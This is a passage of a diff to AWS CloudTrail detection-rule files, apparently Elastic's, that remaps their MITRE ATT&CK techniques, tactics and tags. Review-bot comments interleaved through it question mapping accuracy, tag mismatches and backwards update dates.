"https://attack.mitre.org/techniques/T1098/003/" - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/persistence_iam_roles_anywhere_trusted_anchor_created_with_external_ca.toml b/rules/integrations/aws/persistence_iam_roles_anywhere_trusted_anchor_created_with_external_ca.toml index 3b4349b0ddf..61a70e9d11f 100644 --- a/rules/integrations/aws/persistence_iam_roles_anywhere_trusted_anchor_created_with_external_ca.toml 
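Review bot: The blank-line layout the new side produces (no blank after `framework = "MITRE ATT&CK"`, two blanks before `[rule.threat.tactic]`) differs from the one-blank-line convention the removed lines show, and the identical pattern recurs in every file in this diff, which suggests a serializer quirk rather than an intended style. If these files are emitted by the repo's TOML writer, fix the writer so a re-save of a checked-in rule is a no-op; if they were edited by hand, normalise to a single blank line between tables. Dropping the duplicate TA0004 entry itself is consistent with the Persistence-only tag list above.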
+++ b/rules/integrations/aws/persistence_iam_roles_anywhere_trusted_anchor_created_with_external_ca.toml @@ -2,7 +2,7 @@ creation_date = "2024/04/20" integration = ["aws"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/21" [rule] author = ["Elastic"] @@ -129,21 +129,22 @@ info where event.dataset == "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" - [[rule.threat.technique.subtechnique]] -id = "T1098.001" -name = "Additional Cloud Credentials" -reference = "https://attack.mitre.org/techniques/T1098/001/" +id = "T1098.003" +name = "Additional Cloud Roles" +reference = "https://attack.mitre.org/techniques/T1098/003/" + + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/persistence_iam_saml_provider_created.toml b/rules/integrations/aws/persistence_iam_saml_provider_created.toml index 4a5c55f92b2..4cf0be3208c 100644 --- a/rules/integrations/aws/persistence_iam_saml_provider_created.toml +++ b/rules/integrations/aws/persistence_iam_saml_provider_created.toml @@ -2,7 +2,7 @@ creation_date = "2026/02/05" integration = ["aws"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/05" [rule] author = ["Elastic"] 
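Review bot: The trusted-anchor rule's subtechnique moves from T1098.001 Additional Cloud Credentials to T1098.003 Additional Cloud Roles, which looks like the weaker fit: registering an external CA as a Roles Anywhere trust anchor establishes a new credential issuer rather than granting a role, and the sibling profile-created rule above already covers the role side with T1098.003. Unless there is a deliberate reason to align both rules on .003, keep `id = "T1098.001"`, `name = "Additional Cloud Credentials"` and `reference = "https://attack.mitre.org/techniques/T1098/001/"` here. This file's `updated_date` also goes backwards to `2026/01/21` while its mapping changes.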
@@ -94,7 +94,15 @@ references = [ risk_score = 47 rule_id = "a80ffc40-a256-475a-a86a-74361930cdb1" severity = "medium" -tags = ["Domain: Cloud", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS IAM", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Data Source: AWS", + "Data Source: Amazon Web Services", + "Data Source: AWS IAM", + "Use Case: Identity and Access Audit", + "Tactic: Persistence", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "query" @@ -108,34 +116,39 @@ event.dataset: "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" + + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1484" name = "Domain or Tenant Policy Modification" reference = "https://attack.mitre.org/techniques/T1484/" - [[rule.threat.technique.subtechnique]] id = "T1484.002" name = "Trust Modification" reference = "https://attack.mitre.org/techniques/T1484/002/" + + [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/persistence_lambda_backdoor_invoke_function_for_any_principal.toml b/rules/integrations/aws/persistence_lambda_backdoor_invoke_function_for_any_principal.toml index 1f7a7230315..0e89738a87d 100644 
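Review bot: The SAML-provider-created tags hunk removes `"Tactic: Privilege Escalation"`, but the threat hunk below keeps the TA0004 Privilege Escalation entry (T1484.002 Trust Modification), so tags and mapping disagree in the new file. Restore `"Tactic: Privilege Escalation",` after `"Tactic: Persistence",` or remove the second `[[rule.threat]]` entry; the two must be changed together. The new T1078.004 Valid Accounts: Cloud Accounts entry under Persistence is also a loose fit for creating an identity provider, which is arguably a trust change rather than account use, so it is worth a second look while the mapping is open.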
--- a/rules/integrations/aws/persistence_lambda_backdoor_invoke_function_for_any_principal.toml +++ b/rules/integrations/aws/persistence_lambda_backdoor_invoke_function_for_any_principal.toml @@ -2,7 +2,7 @@ creation_date = "2024/04/30" integration = ["aws"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/21" [rule] author = ["Elastic"] @@ -89,7 +89,15 @@ references = [ risk_score = 47 rule_id = "151d8f72-0747-11ef-a0c2-f661ea17fbcc" severity = "medium" -tags = ["Domain: Cloud", "Tactic: Defense Evasion", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS Lambda", "Use Case: Threat Detection", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Data Source: AWS", + "Data Source: Amazon Web Services", + "Data Source: AWS Lambda", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -105,21 +113,17 @@ info where event.dataset == "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1578" -name = "Modify Cloud Compute Infrastructure" -reference = "https://attack.mitre.org/techniques/T1578/" +id = "T1546" +name = "Event Triggered Execution" +reference = "https://attack.mitre.org/techniques/T1546/" -[[rule.threat.technique.subtechnique]] -id = "T1578.005" -name = "Modify Cloud Compute Configurations" -reference = "https://attack.mitre.org/techniques/T1578/005/" [rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/persistence_rds_db_instance_password_modified.toml b/rules/integrations/aws/persistence_rds_db_instance_password_modified.toml index 215103ed6fa..941d53cbad3 100644 
--- a/rules/integrations/aws/persistence_rds_db_instance_password_modified.toml +++ b/rules/integrations/aws/persistence_rds_db_instance_password_modified.toml @@ -2,7 +2,7 @@ creation_date = "2024/06/27" integration = ["aws"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/21" [rule] author = ["Elastic"] @@ -111,7 +111,17 @@ references = [ risk_score = 47 rule_id = "f2015527-7c46-4bb9-80db-051657ddfb69" severity = "medium" -tags = ["Domain: Cloud", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS RDS", "Resources: Investigation Guide", "Use Case: Threat Detection"] +tags = [ + "Domain: Cloud", + "Data Source: AWS", + "Data Source: Amazon Web Services", + "Data Source: AWS RDS", + "Resources: Investigation Guide", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Privilege Escalation", + "Tactic: Defense Evasion", +] timestamp_override = "event.ingested" type = "eql" 
@@ -126,29 +136,36 @@ info where event.dataset == "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" +[[rule.threat.technique.subtechnique]] +id = "T1098.001" +name = "Additional Cloud Credentials" +reference = "https://attack.mitre.org/techniques/T1098/001/" + + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/persistence_rds_instance_made_public.toml b/rules/integrations/aws/persistence_rds_instance_made_public.toml index d21a1075755..cac81e06dff 100644 --- a/rules/integrations/aws/persistence_rds_instance_made_public.toml +++ b/rules/integrations/aws/persistence_rds_instance_made_public.toml @@ -2,7 +2,7 @@ creation_date = "2024/06/29" integration = ["aws"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/21" [rule] author = ["Elastic"] 
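Review bot: The new TA0004 Privilege Escalation and TA0005 Defense Evasion `[[rule.threat]]` entries carry a tactic but no technique, so neither the mapping nor the `"Tactic: Defense Evasion"` tag added above gives an analyst any rationale for why a master-password change evades defenses. Technique-less entries appear to be schema-valid, but every other entry in this diff pairs a tactic with a technique, and the diff itself repeats T1098.003 under both TA0003 and TA0004 elsewhere, so `T1098.001` can be repeated under TA0004 the same way. Either attach a technique to each tactic-only entry or drop the entry and its tag; the Defense Evasion entry in particular needs a stated reason to stay.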
@@ -144,29 +144,29 @@ any where event.dataset == "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1578" -name = "Modify Cloud Compute Infrastructure" -reference = "https://attack.mitre.org/techniques/T1578/" +id = "T1556" +name = "Modify Authentication Process" +reference = "https://attack.mitre.org/techniques/T1556/" +[[rule.threat.technique.subtechnique]] +id = "T1556.009" +name = "Conditional Access Policies" +reference = "https://attack.mitre.org/techniques/T1556/009/" -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1133" -name = "External Remote Services" -reference = "https://attack.mitre.org/techniques/T1133/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/persistence_route_53_domain_transfer_lock_disabled.toml b/rules/integrations/aws/persistence_route_53_domain_transfer_lock_disabled.toml index b06ff83c72e..7fefa1edaae 100644 --- a/rules/integrations/aws/persistence_route_53_domain_transfer_lock_disabled.toml +++ b/rules/integrations/aws/persistence_route_53_domain_transfer_lock_disabled.toml @@ -2,7 +2,7 @@ creation_date = "2021/05/10" integration = ["aws"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/16" [rule] author = ["Elastic", "Austin Songer"] 
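Review bot: Mapping the RDS-instance-made-public rule to T1556.009 Modify Authentication Process: Conditional Access Policies looks wrong: that subtechnique describes changing identity-provider conditional-access rules, whereas this rule (by its name) fires on a database instance becoming publicly reachable, which changes network exposure rather than any authentication process. The removed T1133 External Remote Services entry under Persistence described that exposure more faithfully, and if Defense Evasion is kept the removed T1578.005 is more specific than the new technique-less TA0005 entry. The tags hunk for this file is not in view; whatever is decided, the tag list has to carry exactly the tactics present here.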
@@ -104,7 +104,16 @@ references = [ risk_score = 73 rule_id = "12051077-0124-4394-9522-8f4f4db1d674" severity = "high" -tags = ["Domain: Cloud", "Tactic: Defense Evasion", "Tactic: Resource Development", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS Route 53", "Use Case: Asset Visibility", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Data Source: AWS", + "Data Source: Amazon Web Services", + "Data Source: AWS Route 53", + "Use Case: Asset Visibility", + "Tactic: Persistence", + "Tactic: Resource Development", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "query" @@ -118,34 +127,34 @@ event.dataset: aws.cloudtrail [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1562" -name = "Impair Defenses" -reference = "https://attack.mitre.org/techniques/T1562/" +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1584" name = "Compromise Infrastructure" reference = "https://attack.mitre.org/techniques/T1584/" - [[rule.threat.technique.subtechnique]] id = "T1584.001" name = "Domains" reference = "https://attack.mitre.org/techniques/T1584/001/" + + [rule.threat.tactic] id = "TA0042" name = "Resource Development" reference = "https://attack.mitre.org/tactics/TA0042/" + [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/persistence_route_53_domain_transferred_to_another_account.toml b/rules/integrations/aws/persistence_route_53_domain_transferred_to_another_account.toml index fe3fe241355..cabac631f4d 100644 
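Review bot: T1098 Account Manipulation under Persistence is a loose fit for disabling a Route 53 domain transfer lock: no principal, credential or permission changes, only a registrar setting on a domain does. The existing T1584.001 Compromise Infrastructure: Domains entry already captures the risk, so either justify the Persistence entry with a technique that matches the action or drop it together with the new `"Tactic: Persistence"` tag above. The same T1098/Persistence pairing is added to the domain-transferred rule in the next hunk, so the two should be decided together.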
--- a/rules/integrations/aws/persistence_route_53_domain_transferred_to_another_account.toml +++ b/rules/integrations/aws/persistence_route_53_domain_transferred_to_another_account.toml @@ -2,7 +2,7 @@ creation_date = "2021/05/10" integration = ["aws"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/21" [rule] author = ["Elastic", "Austin Songer"] @@ -104,7 +104,16 @@ references = ["https://docs.aws.amazon.com/Route53/latest/APIReference/API_Opera risk_score = 73 rule_id = "2045567e-b0af-444a-8c0b-0b6e2dae9e13" severity = "high" -tags = ["Domain: Cloud", "Tactic: Resource Development", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS Route 53", "Use Case: Asset Visibility", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Data Source: AWS", + "Data Source: Amazon Web Services", + "Data Source: AWS Route 53", + "Use Case: Asset Visibility", + "Tactic: Persistence", + "Tactic: Resource Development", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "query" @@ -118,21 +127,34 @@ event.dataset: aws.cloudtrail [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1584" name = "Compromise Infrastructure" reference = "https://attack.mitre.org/techniques/T1584/" - [[rule.threat.technique.subtechnique]] id = "T1584.001" name = "Domains" reference = "https://attack.mitre.org/techniques/T1584/001/" + + [rule.threat.tactic] id = "TA0042" name = "Resource Development" reference = "https://attack.mitre.org/tactics/TA0042/" + [rule.investigation_fields] field_names = [ "@timestamp", 
diff --git a/rules/integrations/aws/persistence_route_53_hosted_zone_associated_with_a_vpc.toml b/rules/integrations/aws/persistence_route_53_hosted_zone_associated_with_a_vpc.toml index 3b9bf00653d..6a09be1c590 100644 --- a/rules/integrations/aws/persistence_route_53_hosted_zone_associated_with_a_vpc.toml +++ b/rules/integrations/aws/persistence_route_53_hosted_zone_associated_with_a_vpc.toml @@ -2,7 +2,7 @@ creation_date = "2021/07/19" integration = ["aws"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/16" [rule] author = ["Austin Songer", "Elastic"] @@ -102,7 +102,16 @@ references = ["https://docs.aws.amazon.com/Route53/latest/APIReference/API_Assoc risk_score = 47 rule_id = "e3c27562-709a-42bd-82f2-3ed926cced19" severity = "medium" -tags = ["Domain: Cloud", "Tactic: Defense Evasion", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS Route 53", "Use Case: Asset Visibility", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Data Source: AWS", + "Data Source: Amazon Web Services", + "Data Source: AWS Route 53", + "Use Case: Asset Visibility", + "Tactic: Persistence", + "Tactic: Resource Development", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "query" 
@@ -116,21 +125,34 @@ event.dataset: aws.cloudtrail [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1578" -name = "Modify Cloud Compute Infrastructure" -reference = "https://attack.mitre.org/techniques/T1578/" +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1583" +name = "Acquire Infrastructure" +reference = "https://attack.mitre.org/techniques/T1583/" [[rule.threat.technique.subtechnique]] -id = "T1578.005" -name = "Modify Cloud Compute Configurations" -reference = "https://attack.mitre.org/techniques/T1578/005/" +id = "T1583.001" +name = "Domains" +reference = "https://attack.mitre.org/techniques/T1583/001/" + + [rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" +id = "TA0042" +name = "Resource Development" +reference = "https://attack.mitre.org/tactics/TA0042/" + [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/persistence_route_table_created.toml b/rules/integrations/aws/persistence_route_table_created.toml index 1d7f572fb57..fe48343e5ba 100644 --- a/rules/integrations/aws/persistence_route_table_created.toml +++ b/rules/integrations/aws/persistence_route_table_created.toml @@ -2,7 +2,7 @@ creation_date = "2021/06/05" integration = ["aws"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/16" [rule] author = ["Elastic", "Austin Songer"] 
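Review bot: T1583.001 Acquire Infrastructure: Domains is a Resource Development technique for domains an adversary obtains before compromise, which CloudTrail in the victim account cannot observe; associating an existing hosted zone with a VPC is a victim-side change. The sibling Route 53 rules in this diff use T1584.001 Compromise Infrastructure: Domains for comparable actions, so `id = "T1584.001"` with parent `T1584` (`reference = "https://attack.mitre.org/techniques/T1584/001/"`) would be consistent, or drop the Resource Development entry and the matching tag added in the hunk above. The T1098 Account Manipulation entry added under Persistence also has no evident relation to a DNS zone association and deserves the same scrutiny.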
@@ -64,7 +64,15 @@ references = [ risk_score = 21 rule_id = "e12c0318-99b1-44f2-830c-3a38a43207ca" severity = "low" -tags = ["Domain: Cloud", "Tactic: Defense Evasion", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS EC2", "Use Case: Network Security Monitoring", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Data Source: AWS", + "Data Source: Amazon Web Services", + "Data Source: AWS EC2", + "Use Case: Network Security Monitoring", + "Tactic: Persistence", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "new_terms" @@ -98,20 +106,11 @@ field_names = [ [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1578" -name = "Modify Cloud Compute Infrastructure" -reference = "https://attack.mitre.org/techniques/T1578/" - -[[rule.threat.technique.subtechnique]] -id = "T1578.005" -name = "Modify Cloud Compute Configurations" -reference = "https://attack.mitre.org/techniques/T1578/005/" - [rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + [rule.new_terms] field = "new_terms_fields" value = ["cloud.account.id", "user.name"] diff --git a/rules/integrations/aws/persistence_sensitive_operations_via_cloudshell.toml b/rules/integrations/aws/persistence_sensitive_operations_via_cloudshell.toml index 51d909014ae..1ada122b033 100644 --- a/rules/integrations/aws/persistence_sensitive_operations_via_cloudshell.toml +++ b/rules/integrations/aws/persistence_sensitive_operations_via_cloudshell.toml @@ -2,7 +2,7 @@ creation_date = "2026/02/10" integration = ["aws"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/18" [rule] author = ["Elastic"] 
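Review bot: The route-table rule's `[[rule.threat]]` now has a tactic (TA0003 Persistence) and no technique, replacing T1578.005, so the mapping tells an analyst nothing about how a new route table provides persistence. If Persistence is the intended tactic, attach the technique that motivates it; if none fits, the removed T1578.005 Modify Cloud Compute Configurations under Defense Evasion was at least specific. The tag list in the hunk above already says `"Tactic: Persistence"`, so any change here must be mirrored there.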
@@ -121,54 +121,39 @@ event.dataset: "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" - -[[rule.threat.technique.subtechnique]] -id = "T1098.001" -name = "Additional Cloud Credentials" -reference = "https://attack.mitre.org/techniques/T1098/001/" - -[[rule.threat.technique.subtechnique]] -id = "T1098.003" -name = "Additional Cloud Roles" -reference = "https://attack.mitre.org/techniques/T1098/003/" - [[rule.threat.technique]] id = "T1136" name = "Create Account" reference = "https://attack.mitre.org/techniques/T1136/" - [[rule.threat.technique.subtechnique]] id = "T1136.003" name = "Cloud Account" reference = "https://attack.mitre.org/techniques/T1136/003/" + + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" - [[rule.threat.technique.subtechnique]] id = "T1098.003" name = "Additional Cloud Roles" reference = "https://attack.mitre.org/techniques/T1098/003/" + + [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/persistence_sts_assume_role_with_new_mfa.toml b/rules/integrations/aws/persistence_sts_assume_role_with_new_mfa.toml index d2efba1a208..fefefd67732 100644 --- a/rules/integrations/aws/persistence_sts_assume_role_with_new_mfa.toml +++ b/rules/integrations/aws/persistence_sts_assume_role_with_new_mfa.toml @@ -2,7 +2,7 @@ creation_date = "2024/10/25" integration = ["aws"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/16" [rule] 
@@ -63,7 +63,17 @@ references = [ risk_score = 21 rule_id = "a22f566b-5b23-4412-880d-c6c957acd321" severity = "low" -tags = ["Domain: Cloud", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS STS", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Data Source: AWS", + "Data Source: Amazon Web Services", + "Data Source: AWS STS", + "Use Case: Identity and Access Audit", + "Tactic: Privilege Escalation", + "Tactic: Persistence", + "Tactic: Lateral Movement", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "new_terms" 
@@ -96,39 +106,49 @@ field_names = [ [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" - +id = "T1556" +name = "Modify Authentication Process" +reference = "https://attack.mitre.org/techniques/T1556/" [[rule.threat.technique.subtechnique]] -id = "T1078.004" -name = "Cloud Accounts" -reference = "https://attack.mitre.org/techniques/T1078/004/" +id = "T1556.006" +name = "Multi-Factor Authentication" +reference = "https://attack.mitre.org/techniques/T1556/006/" + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" +id = "T1548" +name = "Abuse Elevation Control Mechanism" +reference = "https://attack.mitre.org/techniques/T1548/" -[[rule.threat.technique.subtechnique]] -id = "T1078.004" -name = "Cloud Accounts" -reference = "https://attack.mitre.org/techniques/T1078/004/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1550" +name = "Use Alternate Authentication Material" +reference = "https://attack.mitre.org/techniques/T1550/" +[[rule.threat.technique.subtechnique]] +id = "T1550.001" +name = "Application Access Token" +reference = "https://attack.mitre.org/techniques/T1550/001/" + + +[rule.threat.tactic] +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" + [rule.new_terms] field = "new_terms_fields" value = ["user.id", "aws.cloudtrail.flattened.request_parameters.serialNumber"] 
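Review bot: The Privilege Escalation entry uses the parent T1548 Abuse Elevation Control Mechanism with no subtechnique, while the customer-managed-policy rule later in this diff maps a comparable IAM action to T1548.005 Temporary Elevated Cloud Access; the two rules should agree on specificity. If the intent is that AssumeRole with a newly registered MFA device yields temporary elevated access, add a `[[rule.threat.technique.subtechnique]]` with `id = "T1548.005"` and `name = "Temporary Elevated Cloud Access"`; if not, say why the parent alone is wanted. The tag list above does match the three tactics here, so only the technique level is at issue.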
diff --git a/rules/integrations/aws/privilege_escalation_iam_administratoraccess_policy_attached_to_group.toml b/rules/integrations/aws/privilege_escalation_iam_administratoraccess_policy_attached_to_group.toml index 5b219d895c2..7a16cf870c9 100644 --- a/rules/integrations/aws/privilege_escalation_iam_administratoraccess_policy_attached_to_group.toml +++ b/rules/integrations/aws/privilege_escalation_iam_administratoraccess_policy_attached_to_group.toml @@ -2,7 +2,7 @@ creation_date = "2024/05/31" integration = ["aws"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/16" [rule] author = ["Elastic"] @@ -121,39 +121,39 @@ iam where event.dataset == "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" - [[rule.threat.technique.subtechnique]] id = "T1098.003" name = "Additional Cloud Roles" reference = "https://attack.mitre.org/techniques/T1098/003/" -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" - [[rule.threat.technique.subtechnique]] id = "T1098.003" name = "Additional Cloud Roles" reference = "https://attack.mitre.org/techniques/T1098/003/" + + [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + [rule.investigation_fields] field_names = [ "@timestamp", 
diff --git a/rules/integrations/aws/privilege_escalation_iam_administratoraccess_policy_attached_to_role.toml b/rules/integrations/aws/privilege_escalation_iam_administratoraccess_policy_attached_to_role.toml index 591f18d2a80..87734bebf8d 100644 --- a/rules/integrations/aws/privilege_escalation_iam_administratoraccess_policy_attached_to_role.toml +++ b/rules/integrations/aws/privilege_escalation_iam_administratoraccess_policy_attached_to_role.toml @@ -2,7 +2,7 @@ creation_date = "2024/05/31" integration = ["aws"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/16" [rule] author = ["Elastic"] @@ -119,39 +119,39 @@ iam where event.dataset == "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" - [[rule.threat.technique.subtechnique]] id = "T1098.003" name = "Additional Cloud Roles" reference = "https://attack.mitre.org/techniques/T1098/003/" -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" - [[rule.threat.technique.subtechnique]] id = "T1098.003" name = "Additional Cloud Roles" reference = "https://attack.mitre.org/techniques/T1098/003/" + + [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + [rule.investigation_fields] field_names = [ "@timestamp", 
